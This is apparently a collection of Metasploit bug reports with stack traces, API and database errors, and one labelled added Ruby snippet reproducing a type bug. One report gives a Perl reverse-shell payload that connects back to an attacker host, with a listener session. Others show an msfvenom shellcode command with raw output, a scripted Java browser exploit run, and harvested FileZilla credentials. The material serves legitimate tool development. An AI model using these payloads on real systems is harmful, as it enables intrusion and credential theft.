"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/abstract/connection_pool.rb:95:in `connection'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:21:in `with_connection'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/db.rb:204:in `default_workspace'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/db_manager.rb:203:in `connect'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/ui/console/driver.rb:194:in `initialize'",
"/opt/metasploit-4.3.0/apps/pro/msf3/msfconsole:142:in `new'",
"/opt/metasploit-4.3.0/apps/pro/msf3/msfconsole:142:in `<top (required)>'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:245:in `load'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:245:in `block in load'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:236:in `load_dependency'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:245:in `load'",
"/opt/metasploit-4.3.0/apps/pro/engine/msfpro:189:in `

'"]

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 889 exploits - 516 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Successfully loaded plugin: pro
msf > search jboss

Matching Modules

   Name                                               Disclosure Date  Rank       Description
   ----                                               ---------------  ----       -----------
   auxiliary/admin/http/jboss_seam_exec               2010-07-19       normal     JBoss Seam 2 Remote Command Execution
   auxiliary/scanner/http/jboss_vulnscan                               normal     JBoss Vulnerability Scanner
   exploit/multi/http/jboss_bshdeployer               2010-04-26       excellent  JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
   exploit/multi/http/jboss_deploymentfilerepository  2010-04-26       excellent  JBoss Java Class DeploymentFileRepository WAR Deployment
   exploit/multi/http/jboss_maindeployer              2007-02-20       excellent  JBoss JMX Console Deployer Upload and Execute

msf > exit
[root@devel ~]#

Possible API bugs

Please see https://gist.github.com/0113c4951351b833bec8

I have commented it up as much as I could to provide context. Just playing around with the API, going through some standard workflows, I have found some methods do not behave as expected. There is still a chance the issue is on my end, but I have compared my code to examples and pored over the PDF documentation and can't find the issue.

Basically, the script takes a name, and a series of reports you want to import into MSF Pro. It creates a new project with the project name given, and proceeds to import, then start_exploit on the data imported.

Once this is done, it is supposed to generate a report. This works under special circumstances, explained in comments in the code.

Any thoughts? msfrpc-client is v1.0.1. MSF Pro 4.2.0 release.

Ruby version (just in case it matters):
ruby 1.9.2p290 (2011-07-09 revision 32553) [x86_64-linux]

XML Export provides details for all modules

Not sure if this is expected or not, but running a single db_nmap command and then running db_export provides an XML that's quite sizable, because all module information is included within.

msf > wc test.xml
[*] exec: wc test.xml
  52288  107342 1940709 test.xml

I expected only used modules would be included, and am having a hard time thinking of a use case in which all modules would need to be provided in an export scenario.

I'm linking the XML generated by this sequence of commands:

msf > db_connect blah:blah@localhost/blah
msf> db_nmap 10.0.0.1
msf> db_export test.xml

XML Sample can be found here: http://pub.pwnieexpress.com/msf_xml_issue_2012021801.xml

Reverse http and https broken

Recent updates to meterpreter have broken the sweet egress tunnels :(
Payloads hit the handler, no URI checksum is performed, a "session" opens far as msfconsole thinks but IRB framework.sessions does not show it. No libs loaded, nada - dummy session

built a binary, uploaded to a host, see results at http://pastie.org/4160498
injecting a live payload: http://pastie.org/4160393

HTTP is same as HTTPS so I'm pretty sure it's at the payload as the handlers have not changed and HTTP means it's not an SSL issue.

Tested against R7 trunk as of this morning

DisablePayloadHandler option doesn't work over msfrpc

The DisablePayloadHandler option appears to be ignored when attempting to execute a module over msfrpc. The error the framework returns is: [03/23/2013 15:38:37] [e(0)] core: Exploit failed (multi/browser/java_jre17_jmxbean): A payload has not been selected.. Sample code below:

#!/usr/bin/python
# requires msgpack-python and pymetasploit from https://github.com/allfro/pymetasploit
from metasploit.msfrpc import MsfRpcClient

c = MsfRpcClient('test')

e = c.modules.use('exploit', 'multi/browser/java_jre17_jmxbean')
e['DisablePayloadHandler'] = True
e['EXE::Custom'] = '/opt/metasploit/tools/memdump/memdump.exe'
print 'Result of execution: %s' % e.execute()
print 'Current job list: %s' % c.jobs.list

msfvenom fails with NoMethodError undefined method `supports?' for [Msf::Module::Platform::Linux]:Array

The offending code is:

68   def init_platform(platform)
69     if(platform.supports?(::Msf::Module::PlatformList.win32))
70       datastore['AllowWin32SEH'] = true
71     end
72   end

The backtrace, with 'p platform.inspect' to show the data:

root@w00den-pickle:/tools/msf_readonly# ./msfvenom -p linux/x86/exec -e x86/alpha_mixed -f raw -b '\x00' PrependSetreuid=true CMD=/bin/bash
"[Msf::Module::Platform::Linux]"
[-] x86/alpha_mixed failed: NoMethodError undefined method `supports?' for [Msf::Module::Platform::Linux]:Array
/root/tools/msf_readonly/modules/encoders/x86/alpha_mixed.rb:70:in `init_platform'
/root/tools/msf_readonly/lib/msf/core/encoder.rb:227:in `encode'
./msfvenom:355:in `block (2 levels) in <main>'
./msfvenom:353:in `upto'
./msfvenom:353:in `block in <main>'
./msfvenom:340:in `each'
./msfvenom:340:in `<main>'
1�1�jFX̀j
X�Rfh-c��h/shh/bin��R
root@w00den-pickle:/tools/msf_readonly#
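
The type mismatch in the report above, as an added example that is not part of the original report or Metasploit's own code. `Demo::Platform` and `Demo::PlatformList` are simplified, hypothetical stand-ins for the framework classes, and `coerce` is an assumed helper that turns the bare Array seen in the backtrace into a list object before `supports?` is called.

```ruby
# Simplified, hypothetical stand-ins for Msf::Module::Platform and
# Msf::Module::PlatformList; only the behaviour needed here is modelled.
module Demo
  module Platform
    class Windows; end
    class Linux; end
  end

  class PlatformList
    attr_reader :platforms

    def initialize(*platforms)
      @platforms = platforms.flatten
    end

    # Counterpart of the PlatformList.win32 call in the reported code.
    def self.win32
      new(Platform::Windows)
    end

    # Assumed helper: accept a PlatformList, a single platform class or
    # an Array of platform classes and always return a PlatformList.
    def self.coerce(src)
      src.is_a?(PlatformList) ? src : new(*Array(src))
    end

    # True when every platform in +other+ is covered by this list.
    def supports?(other)
      other.platforms.all? { |p| platforms.include?(p) }
    end
  end

  # Same shape as init_platform in the report: it assumes the argument
  # already responds to supports?.
  def self.init_platform_as_reported(platform, datastore)
    datastore['AllowWin32SEH'] = true if platform.supports?(PlatformList.win32)
    datastore
  end

  # Defensive variant: normalise the argument before querying it.
  def self.init_platform_checked(platform, datastore)
    list = PlatformList.coerce(platform)
    datastore['AllowWin32SEH'] = true if list.supports?(PlatformList.win32)
    datastore
  end

  # Calls the reported form with the Array from the backtrace and
  # returns the resulting error message (nil if nothing was raised).
  def self.reproduce
    init_platform_as_reported([Platform::Linux], {})
    nil
  rescue NoMethodError => e
    e.message
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "as reported: #{Demo.reproduce}"
  puts "checked, linux:   #{Demo.init_platform_checked([Demo::Platform::Linux], {})}"
  puts "checked, windows: #{Demo.init_platform_checked([Demo::Platform::Windows], {})}"
end
```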

error with undefined Railgun Function in post/windows/gather/cachedump

Cachedump Module is returning this error

[-] Post failed: RuntimeError DLL-function NetGetJoinInformation not found. Known functions: ["NetGetJoinInformation(",
"NetUserDel",
"NetServerGetInfo",
"NetUserGetGroups",
"NetUserGetLocalGroups",
"NetUserEnum",
"NetServerEnum",
"NetApiBufferFree"]

[-] Call stack:
[-] /Users/carlos/Development/msf4/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb:78:in `call_function'
[-] /Users/carlos/Development/msf4/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb:23:in `method_missing'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/cachedump.rb:465:in `run'

Error in post/windows/gather/credentials/filezilla_server when reporting credentials

FileZilla Server Module error

[*] Checking for Filezilla Server directory in: C:\Program Files\FileZilla Server
[*] Found FileZilla Server

[*] Collected the following credentials:
[*] Username: testadmin
[*] Password: 179ad45c6ce2cb97cf1029e212046e81
[*] Group:

[-] Post failed: ArgumentError Invalid address or object for :host (#<Session:meterpreter 192.168.1.154:49380 "windev01\carlos @ WINDEV01">)
[-] Call stack:
[-] /Users/carlos/Development/msf4/lib/msf/core/db.rb:963:in `report_auth_info'
[-] /Users/carlos/Development/msf4/lib/msf/core/auxiliary/report.rb:93:in `report_auth_info'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:163:in `block in get_filezilla_creds'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:148:in `each'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:148:in `get_filezilla_creds'
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/filezilla_server.rb:54:in `run'
[*] Post module execution completed

PG::Error: ERROR: relation "cred_files" does not exist - when removing a workspace with "workspace -d"

Postgres backend, connected to database using valid creds. repros on both a newly created database, and a database with information (including credentials) in it.

msf > db_connect user:pass@localhost/msfx
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"
NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"
NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"
NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"
NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"
NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"
NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"
NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"
NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"
NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"
NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"
NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"
NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"
NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"
NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"
NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"
NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"
NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"
NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"
NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"
NOTICE:  CREATE TABLE will create implicit sequence "tags_id_seq" for serial column "tags.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tags_pkey" for table "tags"
NOTICE:  CREATE TABLE will create implicit sequence "sessions_id_seq" for serial column "sessions.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "sessions_pkey" for table "sessions"
NOTICE:  CREATE TABLE will create implicit sequence "session_events_id_seq" for serial column "session_events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "session_events_pkey" for table "session_events"
NOTICE:  CREATE TABLE will create implicit sequence "routes_id_seq" for serial column "routes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "routes_pkey" for table "routes"
NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"
NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"
NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"
NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"
NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"
NOTICE:  CREATE TABLE will create implicit sequence "vuln_details_id_seq" for serial column "vuln_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_details_pkey" for table "vuln_details"
NOTICE:  CREATE TABLE will create implicit sequence "host_details_id_seq" for serial column "host_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "host_details_pkey" for table "host_details"
NOTICE:  CREATE TABLE will create implicit sequence "vuln_attempts_id_seq" for serial column "vuln_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_attempts_pkey" for table "vuln_attempts"
NOTICE:  CREATE TABLE will create implicit sequence "module_details_id_seq" for serial column "module_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_details_pkey" for table "module_details"
NOTICE:  CREATE TABLE will create implicit sequence "module_authors_id_seq" for serial column "module_authors.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_authors_pkey" for table "module_authors"
NOTICE:  CREATE TABLE will create implicit sequence "module_mixins_id_seq" for serial column "module_mixins.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_mixins_pkey" for table "module_mixins"
NOTICE:  CREATE TABLE will create implicit sequence "module_targets_id_seq" for serial column "module_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_targets_pkey" for table "module_targets"
NOTICE:  CREATE TABLE will create implicit sequence "module_actions_id_seq" for serial column "module_actions.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_actions_pkey" for table "module_actions"
NOTICE:  CREATE TABLE will create implicit sequence "module_refs_id_seq" for serial column "module_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_refs_pkey" for table "module_refs"
NOTICE:  CREATE TABLE will create implicit sequence "module_archs_id_seq" for serial column "module_archs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_archs_pkey" for table "module_archs"
NOTICE:  CREATE TABLE will create implicit sequence "module_platforms_id_seq" for serial column "module_platforms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_platforms_pkey" for table "module_platforms"
NOTICE:  CREATE TABLE will create implicit sequence "exploit_attempts_id_seq" for serial column "exploit_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploit_attempts_pkey" for table "exploit_attempts"
[*] Rebuilding the module cache in the background...
msf > workspace -a test_workspace
[*] Added workspace: test_workspace
msf > workspace test_workspace
[*] Workspace: test_workspace
msf > workspace -d test_workspace
[-] Error while running command workspace: PG::Error: ERROR:  relation "cred_files" does not exist
LINE 4:              WHERE a.attrelid = '"cred_files"'::regclass
                                        ^
:             SELECT a.attname, format_type(a.atttypid, a.atttypmod), d.adsrc, a.attnotnull
              FROM pg_attribute a LEFT JOIN pg_attrdef d
                ON a.attrelid = d.adrelid AND a.attnum = d.adnum
             WHERE a.attrelid = '"cred_files"'::regclass
               AND a.attnum > 0 AND NOT a.attisdropped
             ORDER BY a.attnum


Call stack:
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:1158:in `async_exec'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:1158:in `exec_no_cache'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:664:in `block in exec_query'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract_adapter.rb:280:in `block in log'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/notifications/instrumenter.rb:20:in `instrument'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract_adapter.rb:275:in `log'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:663:in `exec_query'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:1283:in `column_definitions'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/postgresql_adapter.rb:859:in `columns'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/schema_cache.rb:12:in `block in initialize'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:228:in `yield'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:228:in `default'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:228:in `columns'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/model_schema.rb:237:in `columns_hash'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/locking/optimistic.rb:129:in `locking_enabled?'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation.rb:170:in `exec_queries'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation.rb:160:in `block in to_a'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/explain.rb:25:in `logging_query_plan'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation.rb:159:in `to_a'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/relation/finder_methods.rb:159:in `all'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_association.rb:380:in `find_target'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_association.rb:333:in `load_target'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_proxy.rb:44:in `load_target'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/collection_proxy.rb:87:in `method_missing'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/associations/builder/has_many.rb:32:in `block in define_destroy_dependency_method'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:407:in `_run__3732377711620605996__destroy__820861483667306654__callbacks'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:405:in `__run_callback'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:385:in `_run_destroy_callbacks'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support/callbacks.rb:81:in `run_callbacks'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/callbacks.rb:254:in `destroy'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:236:in `block in destroy'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:295:in `block in with_transaction_returning_status'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:208:in `transaction'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:293:in `with_transaction_returning_status'
/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:236:in `destroy'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:140:in `block (2 levels) in cmd_workspace'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:125:in `each'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:125:in `block in cmd_workspace'
/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'
/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/db.rb:96:in `cmd_workspace'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in `run'
./msfconsole:148:in `<main>'
msf >

Payload cmd/unix/reverse_perl suggestion

Suggested "improvement" to cmd/unix/reverse_perl.rb

Change payload from
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,"#{lhost}:#{datastore['LPORT']}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"

to
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,"#{lhost}:#{datastore['LPORT']}");$~->fdopen($c,w);STDERR->fdopen($c,w);print $c "$ ";while(<$c>) { print $c qx($_)."$ ";}'

This allows for a prompt to be displayed and captures both stderr and stdout.

Example:
root@bt:~# nc -lvvvp 999
listening on [any] 999 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 60413
$ ls
aix
bsdi
dialup
freebsd
hpux
irix
linux
multi
netware
osx
solaris
unix
windows
$ ps 9890-asdasd
ERROR: Process ID list syntax error.
********* simple selection ********* ********* selection by list *********
-A all processes -C by command name
-N negate selection -G by real group ID (supports names)
-a all w/ tty except session leaders -U by real user ID (supports names)
-d all except session leaders -g by session OR by effective group name
-e all processes -p by process ID
T all processes on this terminal -s processes in the sessions given
a all w/ tty, including other users -t by tty
g OBSOLETE -- DO NOT USE -u by effective user ID (supports names)
r only running processes U processes for specified users
x processes w/o controlling ttys t by tty
*********** output format ********** *********** long options ***********
-o,o user-defined -f full --Group --User --pid --cols --ppid
-j,j job control s signal --group --user --sid --rows --info
-O,O preloaded -o v virtual memory --cumulative --format --deselect
-l,l long u user-oriented --sort --tty --forest --version
-F extra full X registers --heading --no-heading --context
********* misc options *********
-V,V show version L list format codes f ASCII art forest
-m,m,-L,-T,H threads S children in sum -y change -l format
-M,Z security data c true command name -c scheduling class
-w,w wide output n numeric WCHAN,UID -H process hierarchy
$ nosuchcommand generates no output
$

Hope you liek teh milk!

msfupdate troubles

Running ./msfupdate or svn update, the commands executed properly but when near completion an error stating something to do with (" https can not be truncated (http://www.metasploit.com)").
The 3rd try using ./msfupdate it stuck at (" A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib/sprockets
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib/sprockets/cache
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/LICENSE
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/lib
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/lib/sprockets.rb
A lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.3/lib/sprockets" )

Someone please help

Meterpreter reads IP as netmask

ipconfig returns
...
IPv4 Address : 192.168.1.4
IPv4 Netmask : 192.168.1.4
...

client.net.config.interfaces[idx] returns
...
@addrs=["", "192.168.1.4"], @netmasks=["", "192.168.1.4"]
...

something is amiss here.

method `normalize_uri'

Hello all!

I am using msfconsole to exploit a vulnerable VM with an outdated Apache server running on it. I am trying to use the (auxiliary/dos/http/apache_range_dos) module.

I keep getting this error:

Auxiliary failed: NoMethodError undefined method `normalize_uri' for #<Msf::Modules::Mod617578696c696172792f646f732f687474702f6170616368655f72616e67655f646f73::Metasploit3:0xd9ab278>

[-] Call stack:

[-] /opt/metasploit/msf3/modules/auxiliary/dos/http/apache_range_dos.rb:48:in `run'

[*] Auxiliary module execution completed

I can't find this anywhere and I have no idea what is causing it. I can ping the host just fine from the BackTrack5R3 VM and the local host. I have run msfupdate also.

Any help would be greatly appreciated.

DNSSEC issues auxiliary/gather/enum_dns

[-] Auxiliary failed: NameError uninitialized constant Net::DNS::RR::RRSIG
[-] Call stack:
[-]   lib/net/dns/rr.rb:325:in `eval'
[-]   lib/net/dns/rr.rb:325:in `eval'
[-]   lib/net/dns/rr.rb:325:in `new_from_binary'
[-]   lib/net/dns/rr.rb:175:in `parse_packet'
[-]   lib/net/dns/packet.rb:521:in `block in new_from_data'
[-]   lib/net/dns/packet.rb:520:in `times'
